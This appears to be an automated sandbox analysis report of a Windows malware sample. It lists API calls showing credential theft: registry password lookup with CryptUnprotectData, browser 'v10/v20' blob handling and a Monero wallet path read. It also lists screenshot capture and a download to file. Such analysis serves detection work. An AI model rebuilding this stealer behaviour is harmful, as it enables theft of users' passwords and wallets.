                                  • Instruction Fuzzy Hash: 5291D431E00A148FD735AFEADC84AE637F5EB94724F444068E5258B245EB79DC80EF92
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCC8A2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCC8D1
                                  • lstrlen.KERNEL32(00000000), ref: 00FCC8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCC932
                                  • StrCmpCA.SHLWAPI(00000000,00FE4C3C), ref: 00FCC943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: a2b8d61563e7d2e73a8ea2a9086999de9d370499f7d3536ee23a694c5aa20e29
                                  • Instruction ID: 573895b1b5ed96426df3734f05b62a8d58a95f6731271f6d7b7ba17179856278
                                  • Opcode Fuzzy Hash: a2b8d61563e7d2e73a8ea2a9086999de9d370499f7d3536ee23a694c5aa20e29
                                  • Instruction Fuzzy Hash: F761B071D1121A9BDB20EFB6894AFEE7BF9AF05314F04006DE849E7241D738D945ABE0
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00FD0CF0), ref: 00FD4276
                                  • GetDesktopWindow.USER32 ref: 00FD4280
                                  • GetWindowRect.USER32(00000000,?), ref: 00FD428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 00FD42BF
                                  • GetHGlobalFromStream.COMBASE(00FD0CF0,?), ref: 00FD4336
                                  • GlobalLock.KERNEL32(?), ref: 00FD4340
                                  • GlobalSize.KERNEL32(?), ref: 00FD434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: 62d11c46f7d200e335b9b0439a7f5c759fbe8620e6224d9554dbc3f097c8ab99
                                  • Instruction ID: 65bd6d468fbad9985c60578b2a58eb92eee7d11479455e244b01f1e907dc10e3
                                  • Opcode Fuzzy Hash: 62d11c46f7d200e335b9b0439a7f5c759fbe8620e6224d9554dbc3f097c8ab99
                                  • Instruction Fuzzy Hash: 11514E75A10208AFDB24EFE4DC85AEEBBBDEF48314F104129F915A7244DB34AD41DBA1
                                  APIs
                                  • lstrcat.KERNEL32(?,01B9E0B8), ref: 00FCE00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCE037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE07D
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE098
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0AC
                                  • lstrcat.KERNEL32(?,01B8B838), ref: 00FCE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0D4
                                  • lstrcat.KERNEL32(?,01B9D830), ref: 00FCE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FCE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: f4db776061db81536b229c67e404da1aebb3375512cc0ade520ad5984c01878e
                                  • Instruction ID: f9ece9e0cdbbbbc407218a5350500dffe79bfb66607d66384975e988bef8188f
                                  • Opcode Fuzzy Hash: f4db776061db81536b229c67e404da1aebb3375512cc0ade520ad5984c01878e
                                  • Instruction Fuzzy Hash: 7A61BF71D1011CABCB65EFA4CD45BDDB7F8BF88300F1449A8A60AA7240DB749F85AF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB6AFF
                                  • InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB6B2C
                                  • StrCmpCA.SHLWAPI(?,01B9E968), ref: 00FB6B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00FB6B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FB6B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FB6BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00FB6BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00FB6BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00FB6C10
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB6C17
                                  • InternetCloseHandle.WININET(?), ref: 00FB6C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: caf4655862713f299bf8a9a19162fd00cd9038d12e23415a4dc090c2bda261a9
                                  • Instruction ID: 35648eaf4a96066dfd515622414d8df32136b8912cc312ad16cd08bbfb12888f
                                  • Opcode Fuzzy Hash: caf4655862713f299bf8a9a19162fd00cd9038d12e23415a4dc090c2bda261a9
                                  • Instruction Fuzzy Hash: AD4192B1A00209ABDB24DFA5DC85FEE77BCEB44715F008464FA05EB280DB74AD409FA4
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00FD6014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 00FD609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD60D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: 13c5b6751a30027bf63ff761354e793ceedf6c5be78741c4a87bc4c8e8e9b826
                                  • Instruction ID: e9013e4a617d7361a0ad79d6ec2e11bbed4eea1c7090a55c2b355f2b946ce1a5
                                  • Opcode Fuzzy Hash: 13c5b6751a30027bf63ff761354e793ceedf6c5be78741c4a87bc4c8e8e9b826
                                  • Instruction Fuzzy Hash: 42617E71B00544DBDB18CF5CC898A6EB7B7EF84704B2C4A1AE492CB781D731ED80AB95
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE07D
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE098
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0AC
                                  • lstrcat.KERNEL32(?,01B8B838), ref: 00FCE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 00FCE0D4
                                  • lstrcat.KERNEL32(?,01B9D830), ref: 00FCE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FCE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 3a31be971edd771af192db322a44dfebcb7aa16448b14ace553784e549882049
                                  • Instruction ID: 803961d99bb1ac5b79a88b322db280501fddbebb59f85eec83c9a25770758c7e
                                  • Opcode Fuzzy Hash: 3a31be971edd771af192db322a44dfebcb7aa16448b14ace553784e549882049
                                  • Instruction Fuzzy Hash: A341BE31D1011C9BCB65EFA4DD49ADD77B8BF88310F4449A8F91AA7240DB389F85AF90
                                  APIs
                                    • Part of subcall function 00FB77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB7805
                                    • Part of subcall function 00FB77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FB784A
                                    • Part of subcall function 00FB77D0: StrStrA.SHLWAPI(?,Password), ref: 00FB78B8
                                    • Part of subcall function 00FB77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB78EC
                                    • Part of subcall function 00FB77D0: HeapFree.KERNEL32(00000000), ref: 00FB78F3
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FB7A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB7ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00FB7ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB7AF0
                                  • wsprintfA.USER32 ref: 00FB7B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB7B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB7B47
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FB7B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: e97400a7a02f33e80e4a1c46e8a8bcbddb160b0a29fdf2c50b81547b19ede45b
                                  • Instruction ID: 1e94ab6cfa3fb5dfe605f813d8cba74a9336270df921ecb3851025b423c10117
                                  • Opcode Fuzzy Hash: e97400a7a02f33e80e4a1c46e8a8bcbddb160b0a29fdf2c50b81547b19ede45b
                                  • Instruction Fuzzy Hash: 7B31D772A002189FCB24EFE5D8449EFB7B9EBC4714B144529E515A7204DB34E941EF91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00FC820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8243
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8297
                                  • lstrlen.KERNEL32(00000000), ref: 00FC82B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC82EB
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8337
                                  • lstrlen.KERNEL32(00000000), ref: 00FC8351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC8380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 741fdc6f3a2f599aec05fb679f24ba45c651aca0dc61335b2f083d80863f28df
                                  • Instruction ID: 01e2477425c8fc2d93e9d013684839811ea763166491e1fa34924cfbf81a40e1
                                  • Opcode Fuzzy Hash: 741fdc6f3a2f599aec05fb679f24ba45c651aca0dc61335b2f083d80863f28df
                                  • Instruction Fuzzy Hash: BA51B0719006039BEB24EF69D959BAAB7E8EF00790F014528ED16EB244DB38ED51DBD0
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB7805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00FB784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 00FB78B8
                                    • Part of subcall function 00FB7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB775E
                                    • Part of subcall function 00FB7750: RtlAllocateHeap.NTDLL(00000000), ref: 00FB7765
                                    • Part of subcall function 00FB7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB778D
                                    • Part of subcall function 00FB7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00FB77AD
                                    • Part of subcall function 00FB7750: LocalFree.KERNEL32(?), ref: 00FB77B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FB78EC
                                  • HeapFree.KERNEL32(00000000), ref: 00FB78F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00FB7A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: ae1d2839cedb921e247a23349a63755adc876cf9e99736bef80820bc9a153d1b
                                  • Instruction ID: 06853a19aec8c889a685e722d3e931da58854f006ebd37702542dc7584dfb6ec
                                  • Opcode Fuzzy Hash: ae1d2839cedb921e247a23349a63755adc876cf9e99736bef80820bc9a153d1b
                                  • Instruction Fuzzy Hash: D77141B1D0021DAFDB10DF95CC80ADEBBB8FF49310F144569E509A7200EB75AA85DF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00FC4F39), ref: 00FD4545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD454C
                                  • wsprintfW.USER32 ref: 00FD455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00FD45CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00FD45D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 00FD45E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                  • String ID: %hs
                                  • API String ID: 885711575-2783943728
                                  • Opcode ID: c5f8d75536fd7294141a83a086363c38ed7655c37d90c62ef9d790db2d6a1f26
                                  • Instruction ID: 0b23a4f2dd80dcb115da7fc85be6eb963fb10e02fe943822de2c86dc9f16d543
                                  • Opcode Fuzzy Hash: c5f8d75536fd7294141a83a086363c38ed7655c37d90c62ef9d790db2d6a1f26
                                  • Instruction Fuzzy Hash: C431A172A00209BBDB20DBE4DC45FDE77BDAF44710F140165F615EB284EB70AA818BA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB1135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FB1159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FB1173
                                  • RegCloseKey.ADVAPI32(?), ref: 00FB117D
                                  Strings
                                  • wallet_path, xrefs: 00FB116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 00FB114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 80206d71a31a06b89fc8857a2c6309b07ba499f7ee703c19830a8d0000613ff9
                                  • Instruction ID: 20076933aa8187de2581079a437885cf9ac6082fcdb26f0589447dac0d824339
                                  • Opcode Fuzzy Hash: 80206d71a31a06b89fc8857a2c6309b07ba499f7ee703c19830a8d0000613ff9
                                  • Instruction Fuzzy Hash: 26F09675640308BBD7249BE19C4DFEA7BBCEB04715F000064FF15E6284D670598497A1
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00FB9E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00FB9E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 00FB9EA7
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • lstrcpy.KERNEL32(00000000,00FE4C48), ref: 00FB9FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: c61047bf14c6bd6fd2245f3d0a7ae1c5e304d268d8ba52e45ab8f17a3910c14b
                                  • Instruction ID: b8ebf3be39339745a9b74acfc3a2b3371b17a0d74a206db19d4fe60b3535fe53
                                  • Opcode Fuzzy Hash: c61047bf14c6bd6fd2245f3d0a7ae1c5e304d268d8ba52e45ab8f17a3910c14b
                                  • Instruction Fuzzy Hash: D151B631A142099BDB10EFAADC85BDE77A8EF40324F154065F909EB241DBB8ED45AFD0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB5661
                                  • InternetOpenA.WININET(00FDCFEC,00000000,00000000,00000000,00000000), ref: 00FB5677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00FB5692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 00FB56BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 00FB56E1
                                  • InternetCloseHandle.WININET(?), ref: 00FB56FA
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB5701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
